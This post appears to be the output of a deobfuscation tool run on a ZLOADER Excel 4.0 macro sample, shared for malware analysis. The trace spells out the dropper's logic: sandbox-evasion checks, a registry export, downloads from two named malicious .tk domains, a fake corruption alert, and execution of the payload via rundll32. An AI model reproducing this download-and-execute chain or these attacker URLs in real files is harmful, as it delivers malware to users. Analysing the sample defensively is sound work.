dissectmalware

Deobfuscation of ZLOADER XLM macro

May 20th, 2020
  1. Deobfuscated by: https://github.com/DissectMalware/XLMMacroDeobfuscator
  2. sample: https://app.any.run/tasks/b5ef8297-5a4d-46dd-9e01-89e4999cdb6e/
  3. sample ref: https://twitter.com/reecdeep/status/1263145785119707136
  4.  
  5. [Loading Cells]
  6. auto_open: auto_open->Sheet2!$GV$18838
  7. [Starting Deobfuscation]
  8. CELL:GV18838 , FullEvaluation ,SET.VALUE(Sheet2!AW38694,"-39")
  9. CELL:GV18839 , FullEvaluation ,GOTO(HJ43843)
  10. CELL:HJ43843 , FullEvaluation ,SET.VALUE(Sheet2!HB21318,"19")
  11. CELL:HJ43844 , FullEvaluation ,RUN(Sheet2!EE50653)
  12. CELL:EE50653 , FullEvaluation ,SET.VALUE(Sheet2!HQ33119,"-118")
  13. CELL:EE50654 , FullEvaluation ,GOTO(HB65366)
  14. CELL:HB65366 , FullEvaluation ,SET.VALUE(Sheet2!GI30540,"38")
  15. CELL:HB65367 , FullEvaluation ,RUN(Sheet2!IB44586)
  16. CELL:IB44586 , FullEvaluation ,SET.VALUE(Sheet2!AO25178,"-888.8")
  17. CELL:IB44587 , FullEvaluation ,RUN(Sheet2!AM3080)
  18. CELL:AM3080 , FullEvaluation ,SET.VALUE(Sheet2!DM7968,"163")
  19. CELL:AM3081 , FullEvaluation ,GOTO(GZ7209)
  20. CELL:GZ7209 , FullEvaluation ,SET.VALUE(Sheet2!CS62471,"162")
  21. CELL:GZ7210 , FullEvaluation ,RUN(Sheet2!HS55235)
  22. CELL:HS55235 , FullEvaluation ,SET.VALUE(Sheet2!HK38885,"-115")
  23. CELL:HS55236 , FullEvaluation ,RUN(Sheet2!HR16144)
  24. CELL:HR16144 , FullEvaluation ,SET.VALUE(Sheet2!FV62574,"434")
  25. CELL:HR16145 , FullEvaluation ,RUN(Sheet2!A64064)
  26. CELL:A64064 , FullEvaluation ,SET.VALUE(Sheet2!V36648,"250")
  27. CELL:A64065 , FullEvaluation ,GOTO(DW5659)
  28. CELL:DW5659 , FullEvaluation ,FORMULA("=CLOSE(FALSE)",Sheet2!BY37267)
  29. CELL:DW5660 , FullEvaluation ,RUN(Sheet2!HS39528)
  30. CELL:HS39528 , FullEvaluation ,FORMULA("=APP.MAXIMIZE()",Sheet2!HS39529)
  31. CELL:HS39529 , NotImplemented ,APP.MAXIMIZE()
  32. CELL:HS39530 , FullEvaluation ,RUN(Sheet2!GC13846)
  33. CELL:GC13846 , FullEvaluation ,FORMULA("=IF(GET.WINDOW(7),GOTO(R[23420]C[-108]),)",Sheet2!GC13847)
  34. CELL:GC13847 , FullEvaluation ,IF(GET.WINDOW(7),GOTO(R[23420]C[-108]),)
  35. CELL:GC13848 , FullEvaluation , RUN(Sheet2!IH62193)
  36. CELL:IH62193 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-24927]C[-165]))",Sheet2!IH62194)
  37. CELL:IH62194 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-24927]C[-165]))
  38. CELL:IH62195 , FullEvaluation , RUN(Sheet2!HS14490)
  39. CELL:HS14490 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[22776]C[-150]),)",Sheet2!HS14491)
  40. CELL:HS14491 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[22776]C[-150]),)
  41. CELL:HS14492 , FullEvaluation , RUN(Sheet2!IR14879)
  42. CELL:IR14879 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[22387]C[-175]),)",Sheet2!IR14880)
  43. CELL:IR14880 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[22387]C[-175]),)
  44. CELL:IR14881 , FullEvaluation , RUN(Sheet2!BV65087)
  45. CELL:BV65087 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[-27821]C[3]),)",Sheet2!BV65088)
  46. CELL:BV65088 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[-27821]C[3]),)
  47. CELL:BV65088 , FullEvaluation , [TRUE] GOTO(R[-27821]C[3])
  48. CELL:BY37267 , End , CLOSE(FALSE)
  49. CELL:BV65088 , FullEvaluation , [FALSE]
  50. CELL:BV65089 , FullEvaluation , RUN(Sheet2!I45396)
  51. CELL:I45396 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-8130]C[68]),)",Sheet2!I45397)
  52. CELL:I45397 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[-8130]C[68]),)
  53. CELL:I45397 , FullEvaluation , [TRUE] GOTO(R[-8130]C[68])
  54. CELL:BY37267 , End , CLOSE(FALSE)
  55. CELL:I45397 , FullEvaluation , [FALSE]
  56. CELL:I45398 , FullEvaluation , GOTO(N29331)
  57. CELL:N29331 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[7935]C[63]))",Sheet2!N29332)
  58. CELL:N29332 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[7935]C[63]))
  59. CELL:N29333 , FullEvaluation , RUN(Sheet2!DK27988)
  60. CELL:DK27988 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[9278]C[-38]))",Sheet2!DK27989)
  61. CELL:DK27989 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[9278]C[-38]))
  62. CELL:DK27990 , FullEvaluation , RUN(Sheet2!E4390)
  63. CELL:E4390 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[32876]C[72]))",Sheet2!E4391)
  64. CELL:E4391 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[32876]C[72]))
  65. CELL:E4392 , FullEvaluation , GOTO(M44930)
  66. CELL:M44930 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!HV21820)
  67. CELL:M44931 , FullEvaluation , GOTO(CR48643)
  68. CELL:CR48643 , FullEvaluation , FORMULA("=""C:\Users\Public\nSy0P.reg""",Sheet2!HZ40705)
  69. CELL:CR48644 , FullEvaluation , GOTO(HV51866)
  70. CELL:HV51866 , FullEvaluation , FORMULA("=R[3762]C[-1]&GET.WORKSPACE(2)&""\Excel\Security ""&R[22647]C[3]&"" /y""",Sheet2!HW18058)
  71. CELL:HV51867 , FullEvaluation , GOTO(FM56636)
  72. CELL:FM56636 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",Sheet2!ET24206)
  73. CELL:FM56637 , FullEvaluation , GOTO(BE53453)
  74. CELL:BE53453 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-29248]C[93],R[-35396]C[174],0,5)",Sheet2!BE53454)
  75. CELL:BE53454 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",BD57216GET.WORKSPACE(2)\Excel\Security BH76101 /y,0,5)
  76. CELL:BE53455 , FullEvaluation , RUN(Sheet2!FA60753)
  77. CELL:FA60753 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-20051]C[77])))",Sheet2!FA60756)
  78. CELL:FA60754 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",Sheet2!FA60757)
  79. CELL:FA60755 , FullEvaluation , FORMULA("=NEXT()",Sheet2!FA60758)
  80. CELL:FA60756 , PartialEvaluation , WHILE("C:\Users\Public\nSy0P.reg")
  81. CELL:FA60757 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  82. CELL:FA60758 , PartialEvaluation , NEXT()
  83. CELL:FA60759 , FullEvaluation , GOTO(DO43860)
  84. CELL:DO43860 , FullEvaluation , FORMULA("=FOPEN(R[-3156]C[115])",Sheet2!DO43861)
  85. CELL:DO43861 , PartialEvaluation , FOPEN("C:\Users\Public\nSy0P.reg")
  86. CELL:DO43862 , FullEvaluation , GOTO(HE5978)
  87. CELL:HE5978 , FullEvaluation , FORMULA("=FPOS(R[37882]C[-94],215)",Sheet2!HE5979)
  88. CELL:HE5979 , PartialEvaluation , FPOS("""C:\Users\Public\nSy0P.reg""",215)
  89. CELL:HE5980 , FullEvaluation , RUN(Sheet2!HN27507)
  90. CELL:HN27507 , FullEvaluation , FORMULA("=FREAD(R[16353]C[-103],255)",Sheet2!HN27508)
  91. CELL:HN27508 , PartialEvaluation , FREAD("""C:\Users\Public\nSy0P.reg""",255)
  92. CELL:HN27509 , FullEvaluation , RUN(Sheet2!HD24312)
  93. CELL:HD24312 , FullEvaluation , FORMULA("=FCLOSE(R[19548]C[-93])",Sheet2!HD24313)
  94. CELL:HD24313 , PartialEvaluation , FCLOSE("""C:\Users\Public\nSy0P.reg""")
  95. CELL:HD24314 , FullEvaluation , GOTO(F14533)
  96. CELL:F14533 , FullEvaluation , FORMULA("=FILE.DELETE(R[26171]C[228])",Sheet2!F14534)
  97. CELL:F14534 , NotImplemented , FILE.DELETE(R[26171]C[228])
  98. CELL:F14535 , FullEvaluation , RUN(Sheet2!GP55286)
  99. CELL:GP55286 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-27779]C[24])),GOTO(R[-18020]C[-121]),)",Sheet2!GP55287)
  100. CELL:GP55287 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-27779]C[24])),GOTO(R[-18020]C[-121]),)
  101. CELL:GP55288 , FullEvaluation , GOTO(BL55760)
  102. CELL:BL55760 , FullEvaluation , FORMULA("=""C:\Users\Public\C44zPD.html""",Sheet2!X34640)
  103. CELL:BL55761 , FullEvaluation , RUN(Sheet2!D53822)
  104. CELL:D53822 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!DP30771)
  105. CELL:D53823 , FullEvaluation , RUN(Sheet2!EP30832)
  106. CELL:EP30832 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-62]C[-26],R[3807]C[-122],0,0)",Sheet2!EP30833)
  107. CELL:EP30833 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\C44zPD.html",0,0)
  108. CELL:EP30834 , FullEvaluation , GOTO(HO40398)
  109. CELL:HO40398 , FullEvaluation , FORMULA("=FILES(R[-5759]C[-199])",Sheet2!HO40399)
  110. CELL:HO40399 , PartialEvaluation , FILES("C:\Users\Public\C44zPD.html")
  111. CELL:HO40400 , FullEvaluation , GOTO(AD45249)
  112. CELL:AD45249 , FullEvaluation , FORMULA("=IF(ISERROR(R[-4851]C[193]),GOTO(R[-7983]C[47]),)",Sheet2!AD45250)
  113. CELL:AD45250 , FullBranching , IF(ISERROR(R[-4851]C[193]),GOTO(R[-7983]C[47]),)
  114. CELL:AD45250 , FullEvaluation , [TRUE] GOTO(R[-7983]C[47])
  115. CELL:BY37267 , End , CLOSE(FALSE)
  116. CELL:AD45250 , FullEvaluation , [FALSE]
  117. CELL:AD45251 , FullEvaluation , GOTO(H25154)
  118. CELL:H25154 , FullEvaluation , SET.VALUE(Sheet2!FQ30497,"167")
  119. CELL:H25155 , FullEvaluation , RUN(Sheet2!FJ54370)
  120. CELL:FJ54370 , FullEvaluation , SET.VALUE(Sheet2!GQ23117,"112")
  121. CELL:FJ54371 , FullEvaluation , GOTO(E43845)
  122. CELL:E43845 , FullEvaluation , SET.VALUE(Sheet2!BF9812,"-421")
  123. CELL:E43846 , FullEvaluation , RUN(Sheet2!EV4466)
  124. CELL:EV4466 , FullEvaluation , SET.VALUE(Sheet2!GH41243,"275")
  125. CELL:EV4467 , FullEvaluation , GOTO(HC59670)
  126. CELL:HC59670 , FullEvaluation , SET.VALUE(Sheet2!DP53696,"44")
  127. CELL:HC59671 , FullEvaluation , GOTO(HU50919)
  128. CELL:HU50919 , FullEvaluation , SET.VALUE(Sheet2!Y3396,"-499")
  129. CELL:HU50920 , FullEvaluation , GOTO(BU42078)
  130. CELL:BU42078 , FullEvaluation , SET.VALUE(Sheet2!AE6901,"417")
  131. CELL:BU42079 , FullEvaluation , GOTO(BU33894)
  132. CELL:BU33894 , FullEvaluation , SET.VALUE(Sheet2!FB46077,"-495")
  133. CELL:BU33895 , FullEvaluation , GOTO(EC7952)
  134. CELL:EC7952 , FullEvaluation , SET.VALUE(Sheet2!FZ33527,"-179")
  135. CELL:EC7953 , FullEvaluation , GOTO(DA25067)
  136. CELL:DA25067 , FullEvaluation , SET.VALUE(Sheet2!IN320,"-489")
  137. CELL:DA25068 , FullEvaluation , GOTO(GF6215)
  138. CELL:GF6215 , FullEvaluation , FORMULA("=""C:\Users\Public\SN5uF.html""",Sheet2!AG54847)
  139. CELL:GF6216 , FullEvaluation , RUN(Sheet2!BE39499)
  140. CELL:BE39499 , FullEvaluation , FORMULA("=""https://arunruntuchattcar.tk/56hgfbcx.php""",Sheet2!H52699)
  141. CELL:BE39500 , FullEvaluation , GOTO(N31781)
  142. CELL:N31781 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[52591]C[-135],R[54739]C[-110],0,0)",Sheet2!EM108)
  143. CELL:N31782 , FullEvaluation , GOTO(HQ393)
  144. CELL:HQ393 , FullEvaluation , FORMULA("=FILES(R[25754]C[-174])",Sheet2!GY29093)
  145. CELL:HQ394 , FullEvaluation , RUN(Sheet2!AG4385)
  146. CELL:AG4385 , FullEvaluation , FORMULA("=IF(ISERROR(R[5875]C[83]),,RUN(R[-31]C[21]))",Sheet2!DT23218)
  147. CELL:AG4386 , FullEvaluation , RUN(Sheet2!BZ8150)
  148. CELL:BZ8150 , FullEvaluation , FORMULA("=""https://krisithcomdebe.tk/56hgfbcx.php""",Sheet2!ED29365)
  149. CELL:BZ8151 , FullEvaluation , GOTO(HA28272)
  150. CELL:HA28272 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-32699]C[-116],R[-7217]C[-217],0,0)",Sheet2!IP62064)
  151. CELL:HA28273 , FullEvaluation , RUN(Sheet2!DS62361)
  152. CELL:DS62361 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!BL52177)
  153. CELL:DS62362 , FullEvaluation , GOTO(AH30663)
  154. CELL:AH30663 , FullEvaluation , FORMULA("=ALERT(R[28990]C[-81])",Sheet2!EO23187)
  155. CELL:AH30664 , FullEvaluation , RUN(Sheet2!DG5222)
  156. CELL:DG5222 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",Sheet2!BI22211)
  157. CELL:DG5223 , FullEvaluation , GOTO(AL34640)
  158. CELL:AL34640 , FullEvaluation , FORMULA("=R[51958]C[-193]&"",DllRegisterServer""",Sheet2!HR2889)
  159. CELL:AL34641 , FullEvaluation , RUN(Sheet2!HP13960)
  160. CELL:HP13960 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-7044]C[-156],R[-26366]C[9],0,5)",Sheet2!HI29255)
  161. CELL:HP13961 , FullEvaluation , GOTO(EM108)
  162. CELL:EM108 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://arunruntuchattcar.tk/56hgfbcx.php","C:\Users\Public\SN5uF.html",0,0)
  163. CELL:EM109 , FullEvaluation , GOTO(GY29093)
  164. CELL:GY29093 , PartialEvaluation , FILES("C:\Users\Public\SN5uF.html")
  165. CELL:GY29094 , FullEvaluation , RUN(Sheet2!DT23218)
  166. CELL:DT23218 , FullBranching , IF(ISERROR(R[5875]C[83]),,RUN(R[-31]C[21]))
  167. CELL:DT23218 , FullEvaluation , [TRUE]
  168. CELL:DT23219 , FullEvaluation , GOTO(ED29365)
  169. CELL:ED29365 , FullEvaluation , "https://krisithcomdebe.tk/56hgfbcx.php"
  170. CELL:ED29366 , FullEvaluation , RUN(Sheet2!IP62064)
  171. CELL:IP62064 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://krisithcomdebe.tk/56hgfbcx.php""","C:\Users\Public\SN5uF.html",0,0)
  172. CELL:IP62065 , FullEvaluation , RUN(Sheet2!BL52177)
  173. CELL:BL52177 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  174. CELL:BL52178 , FullEvaluation , RUN(Sheet2!EO23187)
  175. CELL:EO23187 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
  176. CELL:EO23188 , FullEvaluation , RUN(Sheet2!BI22211)
  177. CELL:BI22211 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  178. CELL:BI22212 , FullEvaluation , GOTO(HR2889)
  179. CELL:HR2889 , FullEvaluation , C:\Users\Public\SN5uF.html,DllRegisterServer
  180. CELL:HR2890 , FullEvaluation , GOTO(HI29255)
  181. CELL:HI29255 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\SN5uF.html,DllRegisterServer",0,5)
  182. CELL:HI29256 , FullEvaluation , GOTO(BY37267)
  183. CELL:BY37267 , End , CLOSE(FALSE)
  184. CELL:DT23218 , FullEvaluation , [FALSE] RUN(Sheet2!EO23187)
  185. CELL:EO23187 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  186. CELL:EO23188 , FullEvaluation , RUN(Sheet2!BI22211)
  187. CELL:BI22211 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  188. CELL:BI22212 , FullEvaluation , GOTO(HR2889)
  189. CELL:HR2889 , FullEvaluation , C:\Users\Public\SN5uF.html,DllRegisterServer
  190. CELL:HR2890 , FullEvaluation , GOTO(HI29255)
  191. CELL:HI29255 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\SN5uF.html,DllRegisterServer",0,5)
  192. CELL:HI29256 , FullEvaluation , GOTO(BY37267)
  193. CELL:BY37267 , End , CLOSE(FALSE)
  194. time elapsed: 5.366301536560059